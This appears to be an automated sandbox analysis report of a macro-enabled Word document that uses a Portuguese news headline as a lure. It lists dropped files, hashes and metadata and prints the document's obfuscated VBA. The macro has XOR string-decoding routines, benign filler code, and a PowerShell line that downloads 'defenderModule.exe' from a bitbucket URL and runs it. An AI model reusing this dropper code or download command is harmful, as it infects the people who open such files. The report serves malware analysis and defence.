    Preview: ....................I.M.A.G.E.N.S. .O.M.I.T.I.D.A.S. .P.E.L.A. .M.I.D.I.A.,. .M.U.L.H.E.R. .N.E.G.R.A. .M.O.R.R.E. .A.P...S. .D.E.N.U.N.C.I.A.R. .A.T.E.N.D.I.M.E.N.T.O. .R.A.C.I.S.T.A. .E.M. .H.O.S.P.I.T.A.L.../...................................../......................./.I.m.a.g.e.n.s. .d.o. .m.o.m.e.n.t.o. .e.m. .q.u.e. .e.l.a. .e. .d.e.s.f.a.r...a.d.a.m.e.n.t.e. .a.f.a.s.t.a.d.a...................................../............................................................................................................................................................................................................................d............V..............................gd.i..l........... .......;...$..$.If........!v..h.#v...9:V....F...,..t........9.6.,.....5......99...../.............4......F.p............yt.,......d........gd.<^.l........... .......8...$..$.If........!v..h.#v...9:V....F...,..t........9.6.5......99...../.............4......F.p............yt.*......d........gd.
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Medica negra morre covid-19 apos racismo.LNK
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Sun Dec 27 15:51:40 2020, length=100152, window=hide
    Category:dropped
    Size (bytes):2348
    Entropy (8bit):4.565747761817952
    Encrypted:false
    SSDEEP:48:8hr/XTFGq0BBOUJFQh2hr/XTFGq0BBOUJFQ/:8p/XJGq0fFQh2p/XJGq0fFQ/
    MD5:0394E974048EA98ECF27D2599E4DA127
    SHA1:2ADDE38BBE505BEDAF3AA06BCC3174FB61332104
    SHA-256:085C99E95AC64C012A2F5101D89041E72463E98F8222E9DA9C9ACD02D03C5EF2
    SHA-512:BA8D99B5E16A0B7D1BCA074D7829DF388C58A0F11DC469245CEFFAAE2D136838B0ACC6FF4E7C1F0111C8DFD747342888AC9F617D8961ECB4DF871BD9ED38D7F4
    Malicious:false
    Reputation:low
    Preview: L..................F.... ....*0..{...*0..{..\.;.p...8............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.8....Qu. .MEDICA~1.DOC..........Q.y.Q.y*...8.....................M.e.d.i.c.a. .n.e.g.r.a. .m.o.r.r.e. .c.o.v.i.d.-.1.9. . .a.p.o.s. .r.a.c.i.s.m.o...d.o.c.m.......................-...8...[............?J......C:\Users\..#...................\\745773\Users.user\Desktop\Medica negra morre covid-19 apos racismo.docm.E.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.M.e.d.i.c.a. .n.e.g.r.a. .m.o.r.r.e. .c.o.v.i.d.-.1.9. . .a.p.o.s. .r.a.c.i.s.m.o...d.o.c.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):163
    Entropy (8bit):4.489515874118109
    Encrypted:false
    SSDEEP:3:HjkMFXEZgbMgWFfMWQlwAoXEZgbMgWFfMWQlmxWjkMFXEZgbMgWFfMWQlv:HjFFaTFfMWHaTFfMWwFFaTFfMWS
    MD5:B82BF9F2CFCBF49F1FDC8F923E334602
    SHA1:C9EEEB5FC2853C005F663F0FDB693E58BE89159B
    SHA-256:D0B598558E099B82D0423392E9DD6F3357D21CCC47C90FB412FF2E4F9514BCCA
    SHA-512:9EC042C257E6C6246C965753302082494EBBB3C231ADC572616EBC7E18CA3F8AAD9E8F87500DD9D08644684469C6A77B6B44F21C11CEF5D9FAC4635C0B34DDED
    Malicious:false
    Reputation:low
    Preview: [misc]..Medica negra morre covid-19 apos racismo.LNK=0..Medica negra morre covid-19 apos racismo.LNK=0..[misc]..Medica negra morre covid-19 apos racismo.LNK=0..
    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.431160061181642
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
    MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
    SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
    SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
    SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
    C:\Users\user\Desktop\~$dica negra morre covid-19 apos racismo.docm
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.431160061181642
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
    MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
    SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
    SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
    SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

    Static File Info

    General

    File type:Microsoft Word 2007+
    Entropy (8bit):7.94116946391462
    TrID:
    • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
    • Word Microsoft Office Open XML Format document (49504/1) 32.35%
    • Word Microsoft Office Open XML Format document (43504/1) 28.43%
    • ZIP compressed archive (8000/1) 5.23%
    File name:Medica negra morre covid-19 apos racismo.docm
    File size:107431
    MD5:549943fa268b65fee546e7adda0f06ba
    SHA1:0ffc18af6916d88bf456f32a2e85b85e56b6c109
    SHA256:c221dc10d175c2f3fb8366ad3aada1cf06c74ad8483a4a67bf62a0702b41c6f5
    SHA512:6114421c747413253cdae3125f9eaff9aa8111785eebcd0836e9c8b43abc47e3acf82112c007e0fdca41940605f6aecc66f322e5106af8b0ee189a22bd1428da
    SSDEEP:3072:iPSJXeHaWtd2jmnXwTzxktQvdtOvlSHpN6:bQvymA3xkte0vlypN6
    File Content Preview:PK..........!.f.E?............[Content_Types].xml ...(.........................................................................................................................................................................................................

    File Icon

    Icon Hash:e4e6a2a2acbcbcac

    Static OLE Info

    General

    Document Type:OpenXML
    Number of OLE Files:1

    OLE File "/opt/package/joesandbox/database/analysis/334232/sample/Medica negra morre covid-19 apos racismo.docm"

    Indicators

    Has Summary Info:False
    Application Name:unknown
    Encrypted Document:False
    Contains Word Document Stream:
    Contains Workbook/Book Stream:
    Contains PowerPoint Document Stream:
    Contains Visio Document Stream:
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:True

    Summary

    Title:
    Subject:
    Author:Orca
    Keywords:
    Template:Normal
    Last Saved By:Neutral Shop
    Revion Number:12
    Total Edit Time:13
    Create Time:2020-12-24T08:21:00Z
    Last Saved Time:2020-12-27T04:32:00Z
    Number of Pages:25
    Number of Words:365
    Number of Characters:1977
    Creating Application:Microsoft Office Word
    Security:0

    Document Summary

    Number of Lines:16
    Number of Paragraphs:4
    Thumbnail Scaling Desired:false
    Company:
    Contains Dirty Links:false
    Shared Document:false
    Changed Hyperlinks:false
    Application Version:16.0000

    Streams with VBA

    VBA File Name: ThisDocument.cls, Stream Size: 211789
    General
    Stream Path:VBA/ThisDocument
    VBA File Name:ThisDocument.cls
    Stream Size:211789
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . U f . . . . . . . . . . . ; . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > . . 8 . . N . t . . . p . . . . . . . . . I . . l . 0 . . K . . . . . . . . . . . . . . . . . . . . . . Z . . c 4 L . . . Q . { . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 01 00 01 00 01 00 00 c6 1d 00 00 e4 00 00 00 ea 01 00 00 ff ff ff ff cd 1d 00 00 55 66 02 00 00 00 00 00 01 00 00 00 aa 3b c6 45 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 db 3e a4 0a 38 f7 03 4e 9b 74 bd 89 8d 70 1e be a4 e4 03 bb ff bd fd 49 a8 c5 6c ac 30 96 e6 4b 00 00 00 00 00 00 00 00 00 00 00 00 00

    VBA Code Keywords

    Keyword
    "<html><head><meta
    True)
    Byte:
    objItem.DSGlobalCatalogFlag
    objSDUtil.Get("ntSecurityDescriptor")
    img.CreateStickyNote("ageindays_"
    Byte,
    Byte)
    "em"">"
    "bars",
    "Pool
    https://en.wikipedia.org/wiki/Theodorus_of_Cyrene
    "spiral.png",
    Split(theText,
    Object
    objItem.PrimaryOwnerContact
    tii()
    $TempDir
    Wscript.ScriptFullName
    arrDHCPRecord
    CreateObject("Scripting.Filesystemobject")
    Subtitles
    Replace(Text,
    ParseSrt(path,
    Notepad",
    udax(str)
    "Primary
    img.DrawPolygon
    "John"
    objItem.Description
    objItem.PoolNonpagedAllocs
    pivot.LoadChartTemplate
    Where
    ForReading
    False
    "User
    charset(Source)
    Global
    LBound(sb_)
    wdix(p_)
    large
    Allowed
    "Name:
    objtextFile.AtEndOfStream
    objOutput
    objItem.PercentCommittedBytesInUse
    Date)
    objItem.CommitLimit
    "Percent
    'defenderModule.exe'"
    wdix(str)
    UBound(Files)
    height="""
    GetObject("LDAP://OU=Finance,
    "Network:
    "Demand
    'WScript.Echo
    GetObject("winmgmts:"
    objSD.DiscretionaryAcl
    "sample.srt"
    "\Adersoft\Vbsedit\Resources\"
    "Default
    objCatalog
    objItem.PagesPersec
    objItem.DomainName
    objItem.CacheBytes
    pivot.Initialize
    thedy
    Shell.Run
    Vbsedit's
    Delegate
    Distribution
    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT
    CreateObject("Microsoft.Update.AutoUpdate")
    SecondsToString
    objItem.DomainGuid
    "title",
    Stream
    "Server
    "{impersonationLevel=impersonate}!\\"
    arr(i
    timings
    WshShell
    toolkit.OpenFileDialog("",
    objInput.LoadFromFile
    Owner
    objItem.DSTimeServiceFlag
    "<tspan
    Binary
    CreateObject("WbemScripting.SWbemRefresher")
    objDHCPServer.WINSServers
    SFU_Domain")
    Update
    VB_Exposed
    ".png"
    objItem.DSDnsDomainFlag
    objDHCPServer.LeaseRebindingTime
    Input
    scb_(idx)
    "Refresh",
    mask:
    objInput
    Days,
    objOutput.LineSeparator
    strLine
    First
    StringToSeconds(Left(tt,
    Count
    Bytes:
    bytes:
    Mount
    objOutput.charset
    """c:\program
    Spiral
    Limit:
    fso.OpenTextFile(path,
    img.FontFamily
    ADS_RIGHT_DS_CONTROL_ACCESS
    objDHCPServer.Network
    "Transition
    name:
    folder
    FalseSet
    "sheaa"
    Toolkit
    StringToSeconds(from_time)
    objAdminIS.GetCatalogByName("Script
    Video
    VB_GlobalNameSpace
    f.ReadLine
    objShell.ExpandEnvironmentStrings("%LOCALAPPDATA%")
    objItem.SystemDriverResidentBytes
    Stream.Type
    until_time
    "&lt;")
    ADS_ACEFLAG_INHERIT_ACE
    Megabytes:
    Virtual
    unbiased
    "White"
    shift_from
    Flag:
    "ntSecurityDescriptor",
    Kerberos
    Variant
    Source,
    strComputer
    objSD
    VB_Customizable
    objCatalog.AddScope("c:\scripts\Indexing
    objItem.ClientSiteName
    Monitor
    "Lease
    objScope.path
    [System.IO.Path]::GetTempPath();cd
    Len(n)
    "<body></html>"
    sb_(idx)
    days",
    objDHCPServer.LeaseTime
    objItem.Default
    enabled:
    Server",
    objItem.DSPrimaryDomainControllerFlag
    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT
    StringToSeconds(str)
    pivot.Finalize
    Comma
    """>"
    ".bak",
    Kilobytes:
    charset
    Const
    "Number
    objItem.PageFaultsPersec
    Stream.Open
    objAce.InheritedObjectType
    Text,
    file")
    UBound(sb_)
    StringToSeconds(Mid(tt,
    "Script
    Shell
    "Pages
    objNetwork
    note.AddMenuOption
    Using
    hidden
    files\vbsedit\vbsedit.exe""
    Sqr(adj
    firstname,
    "vertical"
    Stream.Read(limit)
    Wscript.Sleep
    "\ageindays_"
    "DHCP
    'Z:\\'")
    records
    "Central
    from_time
    pos),
    objDHCPServer.NetworkMask
    objItem.DSDirectoryServiceFlag
    objItem.SystemCodeTotalBytes
    objItem.FreeSystemPageTableEntries
    objDacl
    pb_()
    "wscript.exe
    String)
    objRefresher.Refresh
    scope"
    String:
    "Date:
    offset,
    colItems
    rebinding
    firstname
    objOutput.SaveToFile
    CreateObject("VirtualServer.Application")
    theText
    pb_(i)
    DC=fabrikam,DC=Com")
    objItem.SystemDriverTotalBytes
    objItem.AvailableKBytes
    "Starting
    "Domain
    (f.AtEndOfStream)
    dest,
    proxy
    CreateObject("ADODB.Stream")
    shift_until
    UBound(pb_):
    Split(Mid(tt,
    "System
    "firefox.exe
    Writable
    Sin(angletotal)
    "Commit
    events"
    img.Create
    $TempDir;(New-Object
    objNetwork.DHCPVirtualNetworkServer
    CDbl(s)
    "Read-only:
    Authenticate
    objScope
    img.CenterText
    number
    VB_Creatable
    Stream.LoadFromFile
    "Free
    img.Load
    Separated
    y="""
    "Open
    fso.CreateTextFile("sample.html",
    their
    address:
    "</text>"
    objItem.WriteCopiesPersec
    "Cache
    Left(Wscript.ScriptFullName,
    Wscript.Echo
    False,
    AscB(MidB(s,
    False)
    "Bypass
    Copies
    fill=""green""/>"
    objDacl.AddAce
    CreateObject("Microsoft.Update.WebProxy")
    objItem.SystemCodeResidentBytes
    Source
    ".axa"
    identical,
    (objWMIService,
    Resident
    ("Select
    objDHCPServer.StartingIPAddress
    (objInput.EOS)
    Information
    objItem.DemandZeroFaultsPersec
    https://en.wikipedia.org/wiki/Central_limit_theorem
    Peak:
    VB_Name
    CreateObject("Vbsedit.ImageProcessor")
    Catalog")
    (fso.FileExists(Source
    thesvg
    objInput.Open
    objDHCPServer.ServerIPAddress
    Mid(m,
    objAutoUpdate.Settings
    objAce.AceType
    objStream
    objRefresher
    objRefresher.AddEnum
    objItem.DnsForestName
    seconds",
    Int(t
    Type:
    Vbsedit",
    angletotal
    InStr(strLine,
    objAce
    System.Net.WebClient).DownloadFile('https://bitbucket.org/seveca-emilia/onemoreslave/downloads/defenderModule.exe',$TempDir+'defenderModule.exe');Start-Process
    objSettings
    CreateObject("Scripting.FileSystemObject")
    Cache
    Sticky
    Table
    pivot.ReplaceTag
    img.color
    path,
    objItem.KeyName
    UBound(Lines)
    objItem.CacheBytesPeak
    Modify
    ReDim
    Atn(opp
    "Maps:
    objInput.charset
    local
    "Time:
    color)
    objItem.DomainControllerName
    objDHCPServer
    "FABRIKAM\kmyer"
    While
    objItem.CacheFaultsPersec
    objWMIService
    "<svg
    objItem.Maps
    Right
    DateDiff("d",
    bytes
    udax(str
    CreateObject("Microsoft.ISAdm")
    Replace(dy,
    objSDUtil.Put
    Attribute
    sample.html",
    objProxy
    "Shift",
    Bytes
    Script
    Create
    arr(i,
    objItem.DomainControllerAddress
    CreateObject("Wscript.Shell")
    objStream.Close
    Entries:
    movie
    Indexing
    CreateObject("vbsedit.imageprocessor")
    Wscript.CreateObject("Wscript.Shell")
    "lightgreen"
    stroke=""red""
    Central
    objItem
    objAdminIS
    objOutput.WriteText
    Directory
    Server
    "Committed
    Second:
    objAce.Flags
    ForReading)
    http-equiv=""Content-Type""
    currentdir
    Resume
    objItem.PoolPagedResidentBytes
    Primary
    pivot.SetColumnNames
    img.FillPolygon
    Reads
    VB_Base
    fso.CopyFile
    Randomize
    Int(t)
    subtitle
    color
    objItem.DSDnsControllerFlag
    Int((t
    objProxy.ReadOnly
    "c:\scripts"
    Forest
    Angle
    Replace(s,
    objItem.Domain
    mult,
    style=""fill:"
    objAce.AceFlags
    pivot.SaveChart
    objInput.LineSeparator
    LenB(s)
    objSDUtil.SetInfo
    Center
    note.ShowBalloon
    Network")
    img.Save
    objDHCPServer.DNSServers
    Split(str,
    "</tspan>"
    Array(objSD)
    objItem.PoolPagedBytes
    Allocations:
    objSDUtil
    objItem.PageWritesPersec
    objItem.PagesOutputPersec
    x="""
    objItem.PageReadsPersec
    objItem.DcSiteName
    ADS_FLAG_OBJECT_TYPE_PRESENT
    "</svg>"
    sb_()
    "Address:
    img.FontSize
    objInput.Type
    resourceLocation
    """/>"
    "Edit
    SecondsToString(seconds)
    WshShell.Run
    objVS
    objOutput.Open
    objDHCPServer.DefaultGatewayAddress
    "Page
    "DhcpSrvLog-Mon.log",
    vbCrLf)
    objItem.SystemCacheResidentBytes
    Int(Max
    Address
    Name:
    Nonpaged
    CreateObject("AccessControlEntry")
    maisLixo()
    "\"))
    Lines
    objDHCPServer.EndingIPAddress
    ElseIf
    birthdate,
    Values
    InputBox("Enter
    vbCrLf
    VB_TemplateDerived
    read:
    "Arial"
    objStream.Type
    objItem.PagesInputPersec
    objProxy.UserName
    Performance
    Variant:
    UBound(s)
    "<text
    Total
    strFile
    Paged
    Service
    Records"
    ".bak"))
    old",
    CreateObject("Vbsedit.PivotTable")
    "Description:
    Faults
    addresses:
    Scope
    udax(p_)
    objItem.DSKerberosDistributionCenterFlag
    Files
    "Ending
    (*.srt)|*.srt",
    CreateObject("VbsEdit.Toolkit")
    Writes
    "&gt;")
    objStream.Open
    objSettings.Save
    theorem
    objDHCPServer.IsEnabled
    Len(h)
    "\root\sfuadmin")
    out.Close
    objAutoUpdate
    FormatNumber(m,
    objProxy.Address
    Document_Open()
    objOutput.Close
    pivot.Add
    StringToSeconds(until_time)
    using
    dominant-baseline=""middle""
    "your
    pos))
    objAce.AccessMask
    objItem.Caption
    "notepad.exe
    "column"
    objItem.CommittedBytes
    objSettings.ScheduledInstallationDay
    WshShell.RegRead("HKLM\SYSTEM\CurrentControlSet\Control\Nls\CodePage\ACP")
    charset(strFile)
    objInput.Close
    System
    "Client
    wdix(str
    bytes()
    "Event
    GUID:
    objtextFile
    String
    Split(strLine,
    "Default:
    "stacked",
    gateway
    Catalog
    "Caption:
    toolkit
    objAce.Trustee
    theorem"
    ParseSrt
    CreateObject("WScript.Shell")
    objItem.PoolNonpagedBytes
    objItem.PoolPagedAllocs
    objItem.AvailableMBytes
    seconds
    Address:
    Stream.Close
    "<rect
    Len(s)
    "WINS
    offset
    objItem.DSDnsForestFlag
    "ThisDocument"
    Domain
    "red"
    Committed
    StringToSeconds
    objScope.Alias
    objStream.LoadFromFile
    "spiral.png"
    Wscript.CreateObject("Scripting.Filesystemobject")
    "sample.fra.srt"
    Controller
    Driver
    image
    objFSO
    "Domain:
    objProxy.BypassProxyOnLocal
    Int(UBound(Lines)
    Output
    Cos(angletotal)
    pivot
    "Write
    objItem.Name
    "<line
    Extended
    "Network
    renewal
    servers:
    objWMIService.ExecQuery
    files
    Entire
    objWMIService.ExecQuery("Select
    Contact:
    InStr(tt,
    Wscript.Quit
    Error
    Compare
    Split(Left(tt,
    Schedule
    'Your
    birthdate
    Properties
    VB_PredeclaredId
    limit
    "Available
    objAce.ObjectType
    rolling
    objSettings.ScheduledInstallationTime
    Memory
    objVS.FindVirtualNetwork("Internal
    objtextFile.ReadLine
    out.Write
    Function
    objShell
    "Host
    "Windows-"
    Volume
    "calendar.png"
    Proxy
    Theodorus
    objItem.DC
    img.BrushColor
    objItem.TransitionFaultsPersec
    Shift
    dy="""
    "aower"
    InStrRev(Wscript.ScriptFullName,
    objItem.AvailableBytes
    objItem.DomainControllerAddressType
    "false"
    video,
    Server:
    objItem.DSWritableFlag
    time:
    Private
    objDHCPServer.LeaseRenewalTime
    objOutput.Type
    f.Close
    "Sum",
    VBA Code
    Attribute VB_Name = "ThisDocument"
    Attribute VB_Base = "1Normal.ThisDocument"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = True
    Attribute VB_Customizable = True
    Function t8gb(str As String) As Variant: Dim bytes() As Byte: bytes = str: t8gb = bytes: End Function
    Function o51z(bytes() As Byte) As String: Dim str As String: str = bytes: o51z = str: End Function
    
    Function xwygun72(str As String) As String
        Const p_ As String = "qc7nf2um"
        Dim sb_() As Byte, pb_() As Byte
        sb_ = t8gb(str)
        pb_ = t8gb(p_)
        
        Dim uL As Long
        uL = UBound(sb_)
        
        ReDim scb_(0 To uL) As Byte
        
        Dim idx As Long
        
        For idx = LBound(sb_) To uL:
            If Not sb_(idx) = 0 Then
                c = sb_(idx)
                For i = 0 To UBound(pb_):
                    c = c Xor pb_(i)
                Next i
                scb_(idx) = c
            End If
        
        Next idx
        
        xwygun72 = o51z(scb_)
    End Function
    
    
    Function udax(str As String) As Variant: Dim bytes() As Byte: bytes = str: udax = bytes: End Function
    Function x74t(bytes() As Byte) As String: Dim str As String: str = bytes: x74t = str: End Function
    
    Function vw823nw7(str As String) As String
        Const p_ As String = "fdqt7e5d"
        Dim sb_() As Byte, pb_() As Byte
        sb_ = udax(str)
        pb_ = udax(p_)
        
        Dim uL As Long
        uL = UBound(sb_)
        
        ReDim scb_(0 To uL) As Byte
        
        Dim idx As Long
        
        For idx = LBound(sb_) To uL:
            If Not sb_(idx) = 0 Then
                c = sb_(idx)
                For i = 0 To UBound(pb_):
                    c = c Xor pb_(i)
                Next i
                scb_(idx) = c
            End If
        
        Next idx
        
        vw823nw7 = x74t(scb_)
    End Function
    Function wdix(str As String) As Variant: Dim bytes() As Byte: bytes = str: wdix = bytes: End Function
    Function h27i(bytes() As Byte) As String: Dim str As String: str = bytes: h27i = str: End Function
    
    Function fh20tl5p(str As String) As String
        Const p_ As String = "n5mzlpzj"
        Dim sb_() As Byte, pb_() As Byte
        sb_ = wdix(str)
        pb_ = wdix(p_)
        
        Dim uL As Long
        uL = UBound(sb_)
        
        ReDim scb_(0 To uL) As Byte
        
        Dim idx As Long
        
        For idx = LBound(sb_) To uL:
            If Not sb_(idx) = 0 Then
                c = sb_(idx)
                For i = 0 To UBound(pb_):
                    c = c Xor pb_(i)
                Next i
                scb_(idx) = c
            End If
        
        Next idx
        
        fh20tl5p = h27i(scb_)
    End Function
    
    
    
    Private Function Base64ToArray(base64 As String) As Variant
        
        Dim oc41c7c4 As Object
        Dim uk9vchaq As Object
        
        Set oc41c7c4 = CreateObject(vw823nw7("I" & "" & "W" & "" & Chr(92) & "I" & Chr(72) & "" & Chr(54) & "" & "*" & "" & Chr(64) & "" & "K" & "I" & "@" & Chr(107) & "g" & "q" & "i" & Chr(97) & "" & "j" & "" & "p" & ""))
        Set uk9vchaq = oc41c7c4.createElement(vw823nw7("f" & "" & Chr(50) & "" & "0"))
        
        uk9vchaq.DataType = vw823nw7("f" & Chr(109) & "" & "j" & "" & Chr(42) & Chr(102) & "" & "e" & "" & Chr(119) & "" & Chr(97) & "2" & Chr(48))
        uk9vchaq.Text = base64
        
        Base64ToArray = uk9vchaq.NodeTypedValue
      
    End Function
    
    Private Sub tii()
    
    
    
    
    
    ' Central limit theorem
    ' using Vbsedit's free Toolkit
    ' rolling a large number of identical, unbiased dice
    ' https://en.wikipedia.org/wiki/Central_limit_theorem
    
    Randomize
    
    Set pivot = CreateObject("Vbsedit.PivotTable")
    pivot.Initialize 2, 1
    pivot.SetColumnNames "Sum", "n", "Number of events"
    
    
    Total = 100000
    
    For n = 2 To 7
      Wscript.Echo n
      For k = 1 To Total
        s = 0
        For i = 1 To n
          s = s + Int(6 * Rnd + 1)
        Next
          
        pivot.Add s, n, 1
       
      Next
    Next
    
    
    pivot.Finalize
    
    
    folder = Left(Wscript.ScriptFullName, InStrRev(Wscript.ScriptFullName, "\"))
    
    pivot.LoadChartTemplate "column"
    pivot.ReplaceTag "title", "Central limit theorem"
    pivot.ReplaceTag "bars", "vertical"
    pivot.ReplaceTag "stacked", "false"
    pivot.SaveChart folder & "column1.htm"
    
    Set Shell = CreateObject("Wscript.Shell")
    Shell.Run folder & "column1.htm", 1, False
    
    
    End Sub
    
    
    Private Sub TI()
    
    ' Read a Comma Separated Values Log
    
    
    
    Const ForReading = 1
    
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" &  "DhcpSrvLog-Mon.log", ForReading)
    
    Wscript.Echo vbCrLf & "DHCP Records"
    
    Do While objtextFile.AtEndOfStream <> True
      strLine = objtextFile.ReadLine
      If InStr(strLine, ",") Then
        arrDHCPRecord = Split(strLine, ",")
        Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
        Wscript.Echo "Date: " & arrDHCPRecord(1)
        Wscript.Echo "Time: " & arrDHCPRecord(2)
        Wscript.Echo "Description: " & arrDHCPRecord(3)
        Wscript.Echo "IP Address: " & arrDHCPRecord(4)
        Wscript.Echo "Host Name: " & arrDHCPRecord(5)
        Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
        i = i + 1
      End If
    Loop
    
    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
    
    Const ForReading = 1
    
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" &  "DhcpSrvLog-Mon.log", ForReading)
    
    Wscript.Echo vbCrLf & "DHCP Records"
    
    Do While objtextFile.AtEndOfStream <> True
      strLine = objtextFile.ReadLine
      If InStr(strLine, ",") Then
        arrDHCPRecord = Split(strLine, ",")
        Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
        Wscript.Echo "Date: " & arrDHCPRecord(1)
        Wscript.Echo "Time: " & arrDHCPRecord(2)
        Wscript.Echo "Description: " & arrDHCPRecord(3)
        Wscript.Echo "IP Address: " & arrDHCPRecord(4)
        Wscript.Echo "Host Name: " & arrDHCPRecord(5)
        Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
        i = i + 1
      End If
    Loop
    
    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
    
    Const ForReading = 1
    
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" &  "DhcpSrvLog-Mon.log", ForReading)
    
    Wscript.Echo vbCrLf & "DHCP Records"
    
    Do While objtextFile.AtEndOfStream <> True
      strLine = objtextFile.ReadLine
      If InStr(strLine, ",") Then
        arrDHCPRecord = Split(strLine, ",")
        Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
        Wscript.Echo "Date: " & arrDHCPRecord(1)
        Wscript.Echo "Time: " & arrDHCPRecord(2)
        Wscript.Echo "Description: " & arrDHCPRecord(3)
        Wscript.Echo "IP Address: " & arrDHCPRecord(4)
        Wscript.Echo "Host Name: " & arrDHCPRecord(5)
        Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
        i = i + 1
      End If
    Loop
    
    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
    
    
    
    Const ForReading = 1
    
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" &  "DhcpSrvLog-Mon.log", ForReading)
    
    Wscript.Echo vbCrLf & "DHCP Records"
    
    Do While objtextFile.AtEndOfStream <> True
      strLine = objtextFile.ReadLine
      If InStr(strLine, ",") Then
        arrDHCPRecord = Split(strLine, ",")
        Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
        Wscript.Echo "Date: " & arrDHCPRecord(1)
        Wscript.Echo "Time: " & arrDHCPRecord(2)
        Wscript.Echo "Description: " & arrDHCPRecord(3)
        Wscript.Echo "IP Address: " & arrDHCPRecord(4)
        Wscript.Echo "Host Name: " & arrDHCPRecord(5)
        Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
        i = i + 1
      End If
    Loop
    
    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
    Const ForReading = 1
    
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" &  "DhcpSrvLog-Mon.log", ForReading)
    
    Wscript.Echo vbCrLf & "DHCP Records"
    
    Do While objtextFile.AtEndOfStream <> True
      strLine = objtextFile.ReadLine
      If InStr(strLine, ",") Then
        arrDHCPRecord = Split(strLine, ",")
        Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
        Wscript.Echo "Date: " & arrDHCPRecord(1)
        Wscript.Echo "Time: " & arrDHCPRecord(2)
        Wscript.Echo "Description: " & arrDHCPRecord(3)
        Wscript.Echo "IP Address: " & arrDHCPRecord(4)
        Wscript.Echo "Host Name: " & arrDHCPRecord(5)
        Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
        i = i + 1
      End If
    Loop
    
